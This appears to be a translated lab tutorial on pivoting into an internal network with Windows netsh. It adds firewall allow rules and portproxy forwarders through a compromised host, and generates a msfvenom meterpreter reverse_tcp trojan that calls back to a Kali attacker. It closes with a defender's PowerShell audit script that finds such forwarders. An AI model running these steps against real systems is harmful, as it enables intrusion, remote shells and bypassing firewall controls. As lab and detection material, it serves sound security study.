Disclaimer: this article is for technical exchange only. Comply with the Cybersecurity Law; otherwise you bear the consequences yourself.
0. Hands-on demonstration video:
https://www.bilibili.com/video/BV1Uv4y1R7vq/
1. Introduction to netsh
netsh is the network configuration command-line tool that ships with Windows itself, so using it does not trigger antivirus detection.
Prerequisite: administrator privileges
2. Environment and topology diagram:
2.1 Environment
kali: NIC 1, bridged, 192.168.1.6
Pivot host win7: NIC 1, bridged, 192.168.1.8; NIC 2, host-only, 10.10.10.7
Target host win2012: NIC 1, host-only, 10.10.10.13
The pivot host win7 has the firewall enabled (domain, private/workgroup and public profiles are all on); only port 80 is open to the external network
netsh advfirewall firewall add rule name="Site" dir=in action=allow protocol=TCP localport=80
View the firewall state
netsh firewall show state
View the netsh portproxy rules
netsh interface portproxy show all
2.2 Topology diagram
3. Internal network penetration steps
3.1 Obtain a webshell on the pivot host, upload an exe trojan and get a reverse shell back to kali
3.2 On the pivot host, add a firewall rule allowing the external network to reach TCP port 1616 on the pivot host
netsh advfirewall firewall add rule name="shiliu" dir=in action=allow protocol=TCP localport=1616
3.3 Add a netsh portproxy rule on the pivot host that maps port 1616 of the pivot host's external IP 192.168.1.8 to port 8080 on the internal host 10.10.10.13
netsh interface portproxy add v4tov4 listenport=1616 connectaddress=10.10.10.13 connectport=8080
3.4 Access the target machine
http://192.168.1.8:1616/bluecms/uploads/
3.5 Obtain a webshell on the target machine
3.6 On the pivot host, add a rule that forwards traffic arriving on the pivot host's port 16161 to port 16161 on the external kali host 192.168.1.6
netsh interface portproxy add v4tov4 listenport=16161 connectaddress=192.168.1.6 connectport=16161
3.7 Build a trojan that connects back to port 16161 on the pivot host's internal IP 10.10.10.7; the pivot host then forwards that traffic on to kali
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.7 lport=16161 -f exe -o 16.exe
3.8 Add a firewall rule on the pivot host allowing inbound TCP port 16161
netsh advfirewall firewall add rule name="16" dir=in action=allow protocol=TCP localport=16161
3.9 Delete the rules
netsh advfirewall firewall delete rule name="shiliu"
netsh advfirewall firewall delete rule name="16"
netsh interface portproxy delete v4tov4 listenport=1616
netsh interface portproxy delete v4tov4 listenport=16161
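From the defender's side, the pattern above leaves two artifacts on the pivot host: a persisted portproxy entry and an inbound allow rule on the same port. The following audit script is an added example, not part of the original post; it assumes it is run as Administrator on the host being checked and that the NetSecurity module is available, and it lists every portproxy forwarder together with the inbound allow rules that expose its listen port.

```powershell
# Added audit example (not from the original post). Assumptions: run as
# Administrator, Windows 8 / Server 2012 or later (NetSecurity module present).
# netsh persists v4tov4 TCP forwarders under this key: value name is
# "<listenaddress>/<listenport>", value data is "<connectaddress>/<connectport>".
$PortProxyKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'

function Get-PortProxyEntry {
    if (-not (Test-Path $PortProxyKey)) { return }   # no forwarders configured
    $key = Get-Item $PortProxyKey
    foreach ($name in $key.GetValueNames()) {
        $listen  = $name -split '/'
        $connect = ([string]$key.GetValue($name)) -split '/'
        [pscustomobject]@{
            ListenAddress  = $listen[0]
            ListenPort     = [int]$listen[1]
            ConnectAddress = $connect[0]
            ConnectPort    = [int]$connect[1]
        }
    }
}

function Get-InboundAllowPort {
    # One row per (rule, protocol, port list) for every enabled inbound allow rule.
    Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True | ForEach-Object {
        $rule = $_
        foreach ($f in ($rule | Get-NetFirewallPortFilter)) {
            [pscustomobject]@{ Rule = $rule.DisplayName; Protocol = $f.Protocol; LocalPort = @($f.LocalPort) }
        }
    }
}

function Find-ExposedPortProxy {
    $allow = @(Get-InboundAllowPort)
    foreach ($e in Get-PortProxyEntry) {
        # Exact port match or "Any"; port ranges in a rule are not expanded here.
        $hits = $allow | Where-Object {
            $_.Protocol -eq 'TCP' -and
            ($_.LocalPort -contains 'Any' -or $_.LocalPort -contains "$($e.ListenPort)")
        }
        [pscustomobject]@{
            Listen       = "$($e.ListenAddress):$($e.ListenPort)"
            ForwardsTo   = "$($e.ConnectAddress):$($e.ConnectPort)"
            FirewallOpen = [bool]$hits        # forwarder reachable through the firewall
            AllowRules   = ($hits.Rule -join ', ')
        }
    }
}

Find-ExposedPortProxy | Format-Table -AutoSize
```

A forwarder whose ConnectAddress is another host and whose FirewallOpen is True is exactly the configuration built in steps 3.2 through 3.8; removing it is the pair of delete commands shown in step 3.9.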